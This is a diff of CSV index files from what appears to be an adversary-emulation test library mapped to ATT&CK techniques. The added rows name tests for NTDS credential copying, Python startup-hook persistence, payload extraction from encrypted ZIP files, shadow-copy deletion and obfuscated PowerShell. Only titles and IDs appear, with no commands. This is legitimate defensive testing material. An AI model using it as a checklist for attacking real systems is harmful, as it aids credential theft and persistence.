 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
@@ -1828,6 +1841,8 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
+credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1861,6 +1876,10 @@ discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-85
 discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
 discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
 discovery,T1652,Device Driver Discovery,1,Device Driver Discovery,235b30a2-e5b1-441f-9705-be6231c88ddd,powershell
+discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
+discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
+discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
+discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
 discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
 discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
 discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
@@ -1923,6 +1942,10 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
 discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
+discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
+discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
+discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
+discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
 discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
 discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
@@ -2039,8 +2062,11 @@ discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linu
 discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
-discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
-discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
+discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
+discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
+discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
+discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
+discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
 discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
@@ -2187,6 +2213,7 @@ impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33
 impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
 impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
 impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
+impact,T1496,Resource Hijacking,2,Windows - Simulate CPU Load with PowerShell,44315fb0-f78d-4cef-b10f-cf21c1fe2c75,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
@@ -2204,6 +2231,7 @@ impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,6
 impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
 impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
 impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-b7ff-30966bfb1aff,sh
+impact,T1490,Inhibit System Recovery,13,Windows - Delete Volume Shadow Copies via Diskshadow,42111a6f-7e7f-482c-9b1b-3cfd090b999c,powershell
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
 impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
@@ -18,6 +18,7 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
 defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
 defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -155,8 +156,7 @@ persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron s
 persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
 persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
-persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
-persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
 persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
@@ -181,6 +181,8 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -271,6 +273,8 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -332,6 +336,8 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
+discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
+discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
 discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
 discovery,T1087.002,Account Discovery: Domain Account,24,Account Enumeration with LDAPDomainDump,a54d497e-8dbe-4558-9895-44944baa395f,sh
 discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
@@ -344,6 +350,7 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtu
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
+discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
 discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
 discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
@@ -369,7 +376,9 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
 discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
-discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
+discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
+discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
+discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
@@ -12,6 +12,7 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
 defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
 defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -94,9 +95,8 @@ defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing us
 persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
 persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
-persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
-persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
-persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
 persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
@@ -114,6 +114,8 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
@@ -181,6 +183,8 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
@@ -221,6 +225,8 @@ credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spo
 credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
+discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
+discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
@@ -230,6 +236,7 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtu
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
+discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
 discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
 discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
@@ -248,7 +255,8 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
 discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
-discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
+discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
+discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
@@ -394,6 +394,7 @@ defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in Po
 defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
 defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
 defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,11,Obfuscated PowerShell Command via Character Array,6683baf0-6e77-4f58-b114-814184ea8150,powershell
 defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
 defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
 defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
@@ -649,6 +650,8 @@ privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
